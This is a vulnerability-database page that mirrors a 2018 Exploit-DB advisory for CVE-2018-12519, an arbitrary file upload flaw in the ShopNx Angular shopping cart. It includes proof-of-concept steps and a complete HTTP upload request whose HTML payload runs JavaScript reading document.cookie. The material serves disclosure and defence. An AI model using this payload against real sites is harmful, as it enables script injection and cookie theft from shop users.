Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ShopNx - Arbitrary File Upload

🗓️ 04 Jul 2018 00:00:00Reported by L0RDType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 62 Views

ShopNx - Arbitrary File Upload vulnerability in Angular5 Single Page Shopping Cart Application

Related
Code
ReporterTitlePublishedViews
Family
0day.today		ShopNx - Arbitrary File Upload Vulnerability
4 Jul 201800:00
zdt
CNVD		ShopNx Arbitrary File Upload Vulnerability
20 Jun 201800:00
cnvd
CVE		CVE-2018-12519
19 Jun 201821:00
cve
Cvelist		CVE-2018-12519
19 Jun 201821:00
cvelist
EUVD		EUVD-2018-4489
7 Oct 202500:30
euvd
exploitpack		ShopNx - Arbitrary File Upload
4 Jul 201800:00
exploitpack
NVD		CVE-2018-12519
19 Jun 201821:29
nvd
Packet Storm		ShopNx Arbitrary File Upload
4 Jul 201800:00
packetstorm
Prion		Hardcoded credentials
19 Jun 201821:29
prion
# Exploit Title: ShopNx - Angular5 Single Page Shopping Cart Application 1 - Arbitrary File Upload
# Date: 2018-07-03
# Exploit Author: L0RD
# Email: [email protected]
# Vendor Homepage: http://codenx.com/
# Version: 1
# CVE: CVE-2018-12519
# Tested on: Win 10
===================================================
# Description :
ShopNx 1 is an Angular 5 single page application which suffers from
arbitrary file upload vulnerability .
Attacker can upload malicious files on server because
the application fails to sufficiently sanitize user-supplied input.

# POC :
1) Login as a regular user and navigate to "edit profile"
2) Click on "Avatar" and upload your HTML file which contains malicious javascript code.
3) You can find your uploaded file here :
   Path : http://shop.codenx.com/uploads/[Your File]


# Request :
=========================
POST /api/media HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site.com/account/edit-profile
Content-Length: 367
Content-Type: multipart/form-data;
boundary=---------------------------31031276124582
Connection: keep-alive

-----------------------------31031276124582
Content-Disposition: form-data; name="file"; filename="file.html"
Content-Type: text/html

<html>
<head>
<title>TEST</title>
</head>
<body>
    <script>
        console.log(document.cookie);
    </script>
</body>
</html>
-----------------------------31031276124582--

====================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Jul 2018 00:00Current
8.8High risk
Vulners AI Score8.8
CVSS 24
CVSS 38.8
EPSS0.09441
shopnxarbitrary file uploadangular5single page applicationvulnerabilitycodenxcve-2018-12519serversanitizeuser inputhtmljavascriptexploitwin 10
62